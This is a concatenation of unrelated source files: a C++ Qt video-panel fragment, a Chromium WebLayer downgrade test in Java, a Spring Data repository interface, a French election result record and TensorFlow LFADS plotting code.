microfone_->setProperty("CallDisableMic", !_enabled); microfone_->setToolTip(_enabled ? QT_TRANSLATE_NOOP("tooltips", "Turn off microphone") : QT_TRANSLATE_NOOP("tooltips", "Turn on microphone")); microfone_->setStyle(QApplication::style()); } } void Ui::VideoPanel::setSelectedMask(MaskWidget* maskWidget) { if (maskWidget) { openMasks_->setPixmap(maskWidget->pixmap()); } }
5,738
14,668
// Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. package org.chromium.weblayer.test; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertTrue; import static org.chromium.content_public.browser.test.util.TestThreadUtils.runOnUiThreadBlocking; import android.content.Context; import android.content.SharedPreferences; import android.content.pm.PackageInfo; import android.content.pm.PackageManager; import androidx.test.filters.SmallTest; import org.junit.After; import org.junit.Before; import org.junit.Rule; import org.junit.Test; import org.junit.runner.RunWith; import org.chromium.base.ContextUtils; import org.chromium.base.PathUtils; import org.chromium.weblayer.shell.InstrumentationActivity; import java.io.File; import java.io.IOException; /** * Tests that WebLayer version changes handle data correctly. */ @RunWith(WebLayerJUnit4ClassRunner.class) public class DowngradeTest { public static final String PREF_LAST_VERSION_CODE = "org.chromium.weblayer.last_version_code_used"; @Rule public InstrumentationActivityTestRule mActivityTestRule = new InstrumentationActivityTestRule(); // A test file in the app's data directory. This should never get deleted. private File mAppFile; // A test file in WebLayer's data directory. This should get deleted when we downgrade. private File mWebLayerDataFile; @Before public void setUp() throws IOException, PackageManager.NameNotFoundException { PathUtils.setPrivateDataDirectorySuffix("weblayer", "weblayer"); mWebLayerDataFile = new File(PathUtils.getDataDirectory(), "testWebLayerFile"); assertTrue(mWebLayerDataFile.createNewFile()); Context context = ContextUtils.getApplicationContext(); PackageManager packageManager = context.getPackageManager(); PackageInfo packageInfo = packageManager.getPackageInfo(context.getPackageName(), 0); mAppFile = new File(packageInfo.applicationInfo.dataDir, "testAppFile"); assertTrue(mAppFile.createNewFile()); } @After public void tearDown() { mAppFile.delete(); mWebLayerDataFile.delete(); } @Test @SmallTest public void testDowngradeDeletesData() throws IOException { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); prefs.edit().putInt(PREF_LAST_VERSION_CODE, 9999_000_00).apply(); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertFalse(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } @Test @SmallTest public void testUnknownLastVersionKeepsData() throws IOException { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); assertFalse(prefs.contains(PREF_LAST_VERSION_CODE)); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertTrue(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } @Test @SmallTest public void testNewVersionKeepsData() { SharedPreferences prefs = ContextUtils.getAppSharedPreferences(); prefs.edit().putInt(PREF_LAST_VERSION_CODE, 1_000_00).apply(); InstrumentationActivity activity = mActivityTestRule.launchWithProfile("profile"); runOnUiThreadBlocking( () -> { activity.loadWebLayerSync(ContextUtils.getApplicationContext()); }); assertTrue(mWebLayerDataFile.exists()); assertTrue(mAppFile.exists()); } }
1,374
4,772
package example.repo; import example.model.Customer1668; import java.util.List; import org.springframework.data.repository.CrudRepository; public interface Customer1668Repository extends CrudRepository<Customer1668, Long> { List<Customer1668> findByLastName(String lastName); }
87
348
{"nom":"Saint-Léon","circ":"12ème circonscription","dpt":"Gironde","inscrits":268,"abs":148,"votants":120,"blancs":13,"nuls":4,"exp":103,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":52},{"nuance":"FI","nom":"M. <NAME>","voix":51}]}
95
82,518
<filename>research/lfads/plot_lfads.py # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ============================================================================== from __future__ import absolute_import from __future__ import division from __future__ import print_function import matplotlib matplotlib.use('Agg') from matplotlib import pyplot as plt import numpy as np import tensorflow as tf def _plot_item(W, name, full_name, nspaces): plt.figure() if W.shape == (): print(name, ": ", W) elif W.shape[0] == 1: plt.stem(W.T) plt.title(full_name) elif W.shape[1] == 1: plt.stem(W) plt.title(full_name) else: plt.imshow(np.abs(W), interpolation='nearest', cmap='jet'); plt.colorbar() plt.title(full_name) def all_plot(d, full_name="", exclude="", nspaces=0): """Recursively plot all the LFADS model parameters in the nested dictionary.""" for k, v in d.iteritems(): this_name = full_name+"/"+k if isinstance(v, dict): all_plot(v, full_name=this_name, exclude=exclude, nspaces=nspaces+4) else: if exclude == "" or exclude not in this_name: _plot_item(v, name=k, full_name=full_name+"/"+k, nspaces=nspaces+4) def plot_time_series(vals_bxtxn, bidx=None, n_to_plot=np.inf, scale=1.0, color='r', title=None): if bidx is None: vals_txn = np.mean(vals_bxtxn, axis=0) else: vals_txn = vals_bxtxn[bidx,:,:] T, N = vals_txn.shape if n_to_plot > N: n_to_plot = N plt.plot(vals_txn[:,0:n_to_plot] + scale*np.array(range(n_to_plot)), color=color, lw=1.0) plt.axis('tight') if title: plt.title(title) def plot_lfads_timeseries(data_bxtxn, model_vals, ext_input_bxtxi=None, truth_bxtxn=None, bidx=None, output_dist="poisson", conversion_factor=1.0, subplot_cidx=0, col_title=None): n_to_plot = 10 scale = 1.0 nrows = 7 plt.subplot(nrows,2,1+subplot_cidx) if output_dist == 'poisson': rates = means = conversion_factor * model_vals['output_dist_params'] plot_time_series(rates, bidx, n_to_plot=n_to_plot, scale=scale, title=col_title + " rates (LFADS - red, Truth - black)") elif output_dist == 'gaussian': means_vars = model_vals['output_dist_params'] means, vars = np.split(means_vars,2, axis=2) # bxtxn stds = np.sqrt(vars) plot_time_series(means, bidx, n_to_plot=n_to_plot, scale=scale, title=col_title + " means (LFADS - red, Truth - black)") plot_time_series(means+stds, bidx, n_to_plot=n_to_plot, scale=scale, color='c') plot_time_series(means-stds, bidx, n_to_plot=n_to_plot, scale=scale, color='c') else: assert 'NIY' if truth_bxtxn is not None: plot_time_series(truth_bxtxn, bidx, n_to_plot=n_to_plot, color='k', scale=scale) input_title = "" if "controller_outputs" in model_vals.keys(): input_title += " Controller Output" plt.subplot(nrows,2,3+subplot_cidx) u_t = model_vals['controller_outputs'][0:-1] plot_time_series(u_t, bidx, n_to_plot=n_to_plot, color='c', scale=1.0, title=col_title + input_title) if ext_input_bxtxi is not None: input_title += " External Input" plot_time_series(ext_input_bxtxi, n_to_plot=n_to_plot, color='b', scale=scale, title=col_title + input_title) plt.subplot(nrows,2,5+subplot_cidx) plot_time_series(means, bidx, n_to_plot=n_to_plot, scale=1.0, title=col_title + " Spikes (LFADS - red, Spikes - black)") plot_time_series(data_bxtxn, bidx, n_to_plot=n_to_plot, color='k', scale=1.0) plt.subplot(nrows,2,7+subplot_cidx) plot_time_series(model_vals['factors'], bidx, n_to_plot=n_to_plot, color='b', scale=2.0, title=col_title + " Factors") plt.subplot(nrows,2,9+subplot_cidx) plot_time_series(model_vals['gen_states'], bidx, n_to_plot=n_to_plot, color='g', scale=1.0, title=col_title + " Generator State") if bidx is not None: data_nxt = data_bxtxn[bidx,:,:].T params_nxt = model_vals['output_dist_params'][bidx,:,:].T else: data_nxt = np.mean(data_bxtxn, axis=0).T params_nxt = np.mean(model_vals['output_dist_params'], axis=0).T if output_dist == 'poisson': means_nxt = params_nxt elif output_dist == 'gaussian': # (means+vars) x time means_nxt = np.vsplit(params_nxt,2)[0] # get means else: assert "NIY" plt.subplot(nrows,2,11+subplot_cidx) plt.imshow(data_nxt, aspect='auto', interpolation='nearest') plt.title(col_title + ' Data') plt.subplot(nrows,2,13+subplot_cidx) plt.imshow(means_nxt, aspect='auto', interpolation='nearest') plt.title(col_title + ' Means') def plot_lfads(train_bxtxd, train_model_vals, train_ext_input_bxtxi=None, train_truth_bxtxd=None, valid_bxtxd=None, valid_model_vals=None, valid_ext_input_bxtxi=None, valid_truth_bxtxd=None, bidx=None, cf=1.0, output_dist='poisson'): # Plotting f = plt.figure(figsize=(18,20), tight_layout=True) plot_lfads_timeseries(train_bxtxd, train_model_vals, train_ext_input_bxtxi, truth_bxtxn=train_truth_bxtxd, conversion_factor=cf, bidx=bidx, output_dist=output_dist, col_title='Train') plot_lfads_timeseries(valid_bxtxd, valid_model_vals, valid_ext_input_bxtxi, truth_bxtxn=valid_truth_bxtxd, conversion_factor=cf, bidx=bidx, output_dist=output_dist, subplot_cidx=1, col_title='Valid') # Convert from figure to an numpy array width x height x 3 (last for RGB) f.canvas.draw() data = np.fromstring(f.canvas.tostring_rgb(), dtype=np.uint8, sep='') data_wxhx3 = data.reshape(f.canvas.get_width_height()[::-1] + (3,)) plt.close() return data_wxhx3
3,085